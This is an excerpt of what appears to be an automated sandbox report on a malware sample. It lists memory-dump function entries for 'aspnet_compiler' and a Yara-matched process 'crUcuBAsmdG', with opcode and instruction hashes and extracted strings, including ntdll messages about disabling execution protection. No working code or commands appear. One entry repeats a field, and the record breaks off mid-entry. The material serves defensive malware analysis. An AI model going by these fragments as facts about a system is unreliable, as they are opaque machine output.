                                                      • Instruction Fuzzy Hash: 5590023260180882D10571584404B46040597E0341F55C056A0124699DC715CA917621
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 72fb8a58c6047b7c74132ae7caa7289b32c4d3b1b87aba9a3780f2892b6f7ece
                                                      • Instruction ID: 26059bc958de6bfdc2ce077244d39d6ff4592bc0cf9541c24c2e0db5b0d09e91
                                                      • Opcode Fuzzy Hash: 72fb8a58c6047b7c74132ae7caa7289b32c4d3b1b87aba9a3780f2892b6f7ece
                                                      • Instruction Fuzzy Hash: A2900232601C0442D10571584808747040597D0342F55C051A516459AEC765CAD16631
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 163c28eaed26d21f741ee6b2064e37363cd6a670ae6254c2151c5b420156ae44
                                                      • Instruction ID: 1336aab368ed1ba5b40453f04e8f27da38a4843bdc25962be64c934d0a189a7c
                                                      • Opcode Fuzzy Hash: 163c28eaed26d21f741ee6b2064e37363cd6a670ae6254c2151c5b420156ae44
                                                      • Instruction Fuzzy Hash: 6E900222A01800824145716888449064405BBE1251755C161A0998595DC6598AA55765
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a65e50270daa2bb95435b3c58ee2dd5f4ef9af8c6dea53c00085e213f38ca63b
                                                      • Instruction ID: e3d722858902d8bb0b2818b5d445f1c80ac136f3e5b8bed2622549d44c60200e
                                                      • Opcode Fuzzy Hash: a65e50270daa2bb95435b3c58ee2dd5f4ef9af8c6dea53c00085e213f38ca63b
                                                      • Instruction Fuzzy Hash: F9900232601C0442D1057158481470B040597D0342F55C051A116459ADC7258A916671
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ac0af7c958f8f0bdba1e2704fb4a5c01c964cfc1d59640d9d8470c9e53dcb91
                                                      • Instruction ID: 833ddf8ed4b81c7a396ddd0d2e2a803ca5e8e2b66eb9027f8d7c1340a86cc52f
                                                      • Opcode Fuzzy Hash: 1ac0af7c958f8f0bdba1e2704fb4a5c01c964cfc1d59640d9d8470c9e53dcb91
                                                      • Instruction Fuzzy Hash: 57900222611C0082D20575684C14B07040597D0343F55C155A0154599CCA158AA15621
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b9cb88b942b682415916452ed00147050de33a9a4a7b6ebc32d11a252a15629
                                                      • Instruction ID: 14060e5e22a0f02ff0ed41e3075afa9906c756b2e3af70eeabba2b96cda46948
                                                      • Opcode Fuzzy Hash: 8b9cb88b942b682415916452ed00147050de33a9a4a7b6ebc32d11a252a15629
                                                      • Instruction Fuzzy Hash: E190026274180482D10571584414B060405D7E1341F55C055E1064599DC719CE926226
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8aa3615c7fd2bb64a69ab3fa57336baf0d972abb99d35b2a5005a36baa873813
                                                      • Instruction ID: 3091b2df3532f631e640ff903c121f2cbd62d1d87f0cb57d4afcebbac3ab1dad
                                                      • Opcode Fuzzy Hash: 8aa3615c7fd2bb64a69ab3fa57336baf0d972abb99d35b2a5005a36baa873813
                                                      • Instruction Fuzzy Hash: 7690026261180082D10971584404706044597E1241F55C052A2154599CC6298EA15225
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcff8806188d88e013620f011c8621efccd10cbafd6440531641b1ebe061c072
                                                      • Instruction ID: f98de20f1c0d4d2f4f9fcb468e5053ba30529a6935d88780b0236d6d76bee596
                                                      • Opcode Fuzzy Hash: fcff8806188d88e013620f011c8621efccd10cbafd6440531641b1ebe061c072
                                                      • Instruction Fuzzy Hash: 1E90027260180442D14571584404746040597D0341F55C051A5064599EC7598FD56765
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bc9327e1e374a4245cadade8c0f0d1b42b9be55cb28bee0617ffdb3a3a24926
                                                      • Instruction ID: 1caedc964de7fb8b4424711dd73c0e91aaaa538642a18c914ead6c804e2b9d9f
                                                      • Opcode Fuzzy Hash: 2bc9327e1e374a4245cadade8c0f0d1b42b9be55cb28bee0617ffdb3a3a24926
                                                      • Instruction Fuzzy Hash: 51900222A0180542D10671584404616040A97D0281F95C062A102459AECB258BD2A231
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c2c8571896961ed634c8704205e6cad7ba91f83d07eaf06db9f0ba49104ce3c
                                                      • Instruction ID: b2fdbcf6edff2816614b1c2ec5b9cfea2ef5c514686f7765c50a3708f16b110c
                                                      • Opcode Fuzzy Hash: 1c2c8571896961ed634c8704205e6cad7ba91f83d07eaf06db9f0ba49104ce3c
                                                      • Instruction Fuzzy Hash: 40900262601C0443D14575584804607040597D0342F55C051A206459AECB298E916235
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b400f949e3b304fe1441fb17d2424bf7e247a72e1f6604f804b42b644789540e
                                                      • Instruction ID: 677173c7911cb85eb0c48e3bc8f13e194e831d74a16dadf0353e09945efdf384
                                                      • Opcode Fuzzy Hash: b400f949e3b304fe1441fb17d2424bf7e247a72e1f6604f804b42b644789540e
                                                      • Instruction Fuzzy Hash: 1290022270180442D107715844146060409D7D1385F95C052E142459ADC7258B93A232
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: e07fc9a811566a6e58a2f69728ce2791a9dd5d4d103ee38c453f81e1b238d67b
                                                      • Instruction ID: 831c91cb8b726f709f8a9bbbe02347a6cebabce3a4642ab2f43219ac7c85ee98
                                                      • Opcode Fuzzy Hash: e07fc9a811566a6e58a2f69728ce2791a9dd5d4d103ee38c453f81e1b238d67b
                                                      • Instruction Fuzzy Hash: 3C51B6B5A00156BFDB15DBEC8890A7FFBB8BB08240B54826EF569D7641D334DE4487E0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: ba5834905847b45f841531f3b4c568d0e62d1ab6112b8a0dfb8a237a2e7d38dc
                                                      • Instruction ID: b9d4ef648b656e219604a9d1ee896c5f8f8c665482c46c0587f6518a53dc7beb
                                                      • Opcode Fuzzy Hash: ba5834905847b45f841531f3b4c568d0e62d1ab6112b8a0dfb8a237a2e7d38dc
                                                      • Instruction Fuzzy Hash: 4D51F575A00646AEEF39DE5CC89097EBBFCEF54200B4484EAE5D6C7681E778DA408760
                                                      Strings
                                                      • Execute=1, xrefs: 01B24713
                                                      • ExecuteOptions, xrefs: 01B246A0
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B24787
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B24655
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B24742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B246FC
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B24725
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: c81777d40abaf58ae61cdd273aa50baf65e480a6b18a600f95af52ed8826fbdc
                                                      • Instruction ID: 6fac249583febfa7464bcd1102710df9592e355e9c3f0221059b9db127670a21
                                                      • Opcode Fuzzy Hash: c81777d40abaf58ae61cdd273aa50baf65e480a6b18a600f95af52ed8826fbdc
                                                      • Instruction Fuzzy Hash: 95512B3160021ABAEF25ABE8DC99FBE77F8EF14314F0400D9E605AB191D7709A458F91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 5e535ebcff1d741b9cd3143b13896f31b7315d5bfd3a2424cff256eecbaaf511
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 39817F70E062499EEF258FECC8517EEBBB2AF85360F1C415DFA51A7291C73498408BB1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: e082d4a0e3f9d4419f2759edc3a9150fcde8382b047d457a7acbdf7f5a8b28ee
                                                      • Instruction ID: 9fc288ecf60332809f5209b09c6701d09980324c0ff99f52bfbba8d777a86018
                                                      • Opcode Fuzzy Hash: e082d4a0e3f9d4419f2759edc3a9150fcde8382b047d457a7acbdf7f5a8b28ee
                                                      • Instruction Fuzzy Hash: 2B213676E00119ABEB15DF69D841AFE7BFCEF64654F44019AEA05D3240E734DA018791
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 01B2031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B202BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B202E7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: ef1bf85b57f2f4e02b4d29c58aaaa0d225b32f351932718a1cd0c3c5de0a76a7
                                                      • Instruction ID: 66832531882546d511c605f4379ba2bba6e76b9085007612cccaec6754d4ba57
                                                      • Opcode Fuzzy Hash: ef1bf85b57f2f4e02b4d29c58aaaa0d225b32f351932718a1cd0c3c5de0a76a7
                                                      • Instruction Fuzzy Hash: AFE19E30604B419FD729DF28C884B6BBBE0FB89314F140A5DF5A68B2E1D774D949CB42
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 01B27BAC
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B27B7F
                                                      • RTL: Resource at %p, xrefs: 01B27B8E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: e113c7e07ab97d4011c3a607d19b29e7349a955a26d6f0ee23bccdfc35482aee
                                                      • Instruction ID: f8e1e2c88924013f57c77dadda48f5fd1bdb6e432652198ff20c1bd1e6af53dc
                                                      • Opcode Fuzzy Hash: e113c7e07ab97d4011c3a607d19b29e7349a955a26d6f0ee23bccdfc35482aee
                                                      • Instruction Fuzzy Hash: CB4103317007029FDB29DF29CC58B6AB7E5EF98710F100A5DFA5AD7290DB31E8058BA1
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B2728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B27294
                                                      • RTL: Re-Waiting, xrefs: 01B272C1
                                                      • RTL: Resource at %p, xrefs: 01B272A3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 6e320724c53cbb3c83d82a8fc6c9b6262194c901de357e5740c2af16ace6e6ae
                                                      • Instruction ID: 4b517cc34b4d0c157b0a8e9118c9d441ae567172410567587aa1eb17dc0033bd
                                                      • Opcode Fuzzy Hash: 6e320724c53cbb3c83d82a8fc6c9b6262194c901de357e5740c2af16ace6e6ae
                                                      • Instruction Fuzzy Hash: 19412031700217ABCB29DE29CC45B66B7E1FBA6710F100658F959EB280DB30E85687E5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: d3b25d66010c6bcd4ec38b171c34574ff6ab182561d2cb00abaa3b1204761af0
                                                      • Instruction ID: f1e3c38cd9d662e13e5094cc781fbde499de33343363a02214a47ad82dca3ef2
                                                      • Opcode Fuzzy Hash: d3b25d66010c6bcd4ec38b171c34574ff6ab182561d2cb00abaa3b1204761af0
                                                      • Instruction Fuzzy Hash: 2F318872A002199FDB25DE2DCC80BEE77FCFF54650F4405DAE949E3140EB349A448B60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: a806f2c4079d80ec5596c5415f0498a2988c6b138e645b6a1d3168d6d73165de
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: A491A071E0021A9AEB24DFEDC880ABEBBB5AF44720F58461EFB55E72C0D7349941CB51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: ea342207214798dd2c186a71e2190632107a91178ad59943f3aab0a5f1089aec
                                                      • Instruction ID: 617c126d1eddb679879334fdc38cea4ce390121ed3ae0ae086de1557373ee174
                                                      • Opcode Fuzzy Hash: ea342207214798dd2c186a71e2190632107a91178ad59943f3aab0a5f1089aec
                                                      • Instruction Fuzzy Hash: 07811CB1D002699BDB35CB54CD45BEEB7B8AF08754F1541DAEA19B7280D7305E84CFA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 01B3CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: e6930587c13c24a78fba0df22ce40a5eaa7cbd6281318b588a7238905b03f661
                                                      • Instruction ID: 1e90611faa86d7b1d99cacde3c89fc695ba869bedbbdc3384d3f2749d8c24654
                                                      • Opcode Fuzzy Hash: e6930587c13c24a78fba0df22ce40a5eaa7cbd6281318b588a7238905b03f661
                                                      • Instruction Fuzzy Hash: EF41BD71904215DFCB259FE9C940AAEFBB8FF98B00F4041AEE905EB264D734D804CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $!F$$W%'$%'$,$-9$0$0$1$4$5u$5u$8<$;$;N$=w$B0$DH$P`$Q$Q$V$Z~$_p$`e$b$cm$m$o$rR$ $:
                                                      • API String ID: 0-4271926158
                                                      • Opcode ID: 488b702d4466b1388d986b8d55ce956e872d19b7188e710194d7d4f696229230
                                                      • Instruction ID: eec9fc94dc1e6c99df7118ba6892768eb7394df82214a72a9c428dbc88554331
                                                      • Opcode Fuzzy Hash: 488b702d4466b1388d986b8d55ce956e872d19b7188e710194d7d4f696229230
                                                      • Instruction Fuzzy Hash: 2A32B1B0D05268CBEF28CF99C994BEDBBB2FB44308F10859ED04A6B291D7755A85CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      • Opcode ID: 928da914ebc6ff214dd207d7adc4155db9c060ef3a0aaca39bffdeb5113866dd
                                                      • Instruction ID: 6ebda6bdac0684844993d453ec9cefcd76ed7ec22c8313c0e5c999b66c88a799
                                                      • Instruction ID: d5db7660536c9ac0d495c812c735aaa165c31eca25e25c86b7deb0bb2f7cf8b7
                                                      • Opcode Fuzzy Hash: b4351f2f7e328675d1c07015e39ff52f3a75a6ebb40f7cf32b65b9bc6514c9b3
                                                      • Instruction Fuzzy Hash: 4C11DE10D087CAD9DF12CBBC84086AEBF715F23224F0886D8D8E56B3D2D2794646C7A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$S$\$a$c$e$l
                                                      • API String ID: 0-3322591375
                                                      • Opcode ID: d28677744a139105702420ca88f60d4c0fd5e6206e7fec8eff78a9352e83bfce
                                                      • Instruction ID: faf60e817ecbc22c1965f93430b184ac53aeda6490aa4b370b2ec3ccbef38db7
                                                      • Opcode Fuzzy Hash: d28677744a139105702420ca88f60d4c0fd5e6206e7fec8eff78a9352e83bfce
                                                      • Instruction Fuzzy Hash: 8A4153B6D04218AAEF50DFA4DC88AEEB7F8FF88310F45425AD91DA7100E77156458FE0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: f5c3b78032b7d475c7fe6ed21d173f4aac9b6eb5976e3f79acf28d24cc90005c
                                                      • Instruction ID: c49669f627cfcee64aab5dc7610b7f85baf2ba487aa64815f8b48fe7bb26a62a
                                                      • Opcode Fuzzy Hash: f5c3b78032b7d475c7fe6ed21d173f4aac9b6eb5976e3f79acf28d24cc90005c
                                                      • Instruction Fuzzy Hash: 1451A372A00304AAEB34DFA5CD89BEAB7BCFF45704F044A6DE44966580E7B46544CBF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o$tEw
                                                      • API String ID: 0-1286782980
                                                      • Opcode ID: ef740b9a954609ac904c412c86dc8e7f6c65ae03976a1d894aa74adde4cf00bd
                                                      • Instruction ID: da195bc378c162539ce8df0b4cc3d0e50eb8ace14d5559afbfbe0e9862326a35
                                                      • Opcode Fuzzy Hash: ef740b9a954609ac904c412c86dc8e7f6c65ae03976a1d894aa74adde4cf00bd
                                                      • Instruction Fuzzy Hash: 06812FB2D01218AAFB15EB94CD88FEE737DFF88700F04459DE509A6140EB756B858BE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: 1f7a47482f8f94590bb3051f8a60d11aaecfde86e31343e88beccd8e0fce0b73
                                                      • Instruction ID: f5b05698ddf425b78d3c66123d7cb96df2ca3242f7394425e0ff58bc46242a6d
                                                      • Opcode Fuzzy Hash: 1f7a47482f8f94590bb3051f8a60d11aaecfde86e31343e88beccd8e0fce0b73
                                                      • Instruction Fuzzy Hash: 5A616EB6E00204AFDB24DBA4CC84FEFB7FDEB88714F144558E559A7240E635AA45CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: 018ae1c9aaf1511aa2a75474a8e8f6af209e71c6478f95ad77315efe00d89a76
                                                      • Instruction ID: 372fba26868efc6716d53b64638c621e05b23bb7706458d458e0c2d62c9f7c57
                                                      • Opcode Fuzzy Hash: 018ae1c9aaf1511aa2a75474a8e8f6af209e71c6478f95ad77315efe00d89a76
                                                      • Instruction Fuzzy Hash: 024101B2D00304AFDB20DFA4C884FEEBBFDAB88704F104559E559A7240D775AA44CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o$tEw
                                                      • API String ID: 0-1286782980
                                                      • Opcode ID: 5d55f588c861b0ef3b41afadb11b9400c18f4622001cae6c5d6cb913a125f5d9
                                                      • Instruction ID: 4d2855691a37cd7d5d28cb434d9c82659f65372b3248da5554bc2cac6fb0838b
                                                      • Opcode Fuzzy Hash: 5d55f588c861b0ef3b41afadb11b9400c18f4622001cae6c5d6cb913a125f5d9
                                                      • Instruction Fuzzy Hash: 32415071D01318AAEB14EBA4CD88FEE7379FF88700F04419DA50DA6150EBB46B848FE5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $qC$M$}u$d$g
                                                      • API String ID: 0-1570183175
                                                      • Opcode ID: 0e1d8ef03eb6a860b280abea23434063e9afc4993b95a7fd97b3d0aa26dfd1a3
